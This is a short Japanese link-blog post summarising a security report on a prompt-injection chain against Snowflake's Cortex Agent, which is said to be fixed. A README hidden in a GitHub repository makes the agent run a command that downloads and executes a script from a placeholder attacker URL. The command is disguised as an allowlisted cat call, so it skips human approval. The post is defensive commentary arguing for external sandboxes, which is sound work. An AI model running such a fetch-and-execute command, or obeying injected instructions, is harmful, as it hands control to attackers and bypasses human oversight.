2026年3月18日 - リンクブログ
Snowflake Cortex AI はサンドボックスを抜け出しマルウェアを実行 (経由) PromptArmor の Snowflake の Cortex Agent におけるプロンプト注入攻撃チェーンに関する報告で、現在修正済みです。
攻撃は、Cortex のユーザーがエージェントに README の末尾に隠されたプロンプト注入攻撃を含む GitHub リポジトリをレビューするよう依頼したときに始まりました。
攻撃によりエージェントはこのコードを実行しました:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Cortex は cat コマンドを人間の承認なしに実行しても安全と見なしており、コマンド本体で発生する可能性のあるこの形式のプロセス置換に対する保護を講じていませんでした。
私はこの種のコマンドパターンに対する許可リストを、さまざまなエージェントツールでいくつも見てきましたが、それらを全く信頼していません――本質的に信頼性が低いと感じます。
私はエージェントのコマンドを、プロセス自体が許されているあらゆることを行えるかのように扱いたいです。したがって、エージェント自体のレイヤーの外で動作する決定論的なサンドボックスに関心があります。
最近の記事
- GPT-5.4 mini および GPT-5.4 nano は、52ドルで76,000枚の写真を説明できる - 2026年3月17日
- Pragmatic Summit でのエージェント指向エンジニアリングについてのファイアサイド・チャット - 2026年3月14日
- 結局は退屈な技術ではないかもしれない - 2026年3月9日
This is a link post by Simon Willison, posted on 2026年3月18日.
サンドボックス 35 セキュリティ 579 AI 1917 プロンプト注入 146 生成AI 1700 大規模言語モデル 1666月次ブリーフィング
私をスポンサーしていただくと $10/月、今月の最も重要なLLMの動向を厳選したメール要約をお届けします。
私に支払って、あなたに送る情報を減らします。
スポンサーになる & 購読する



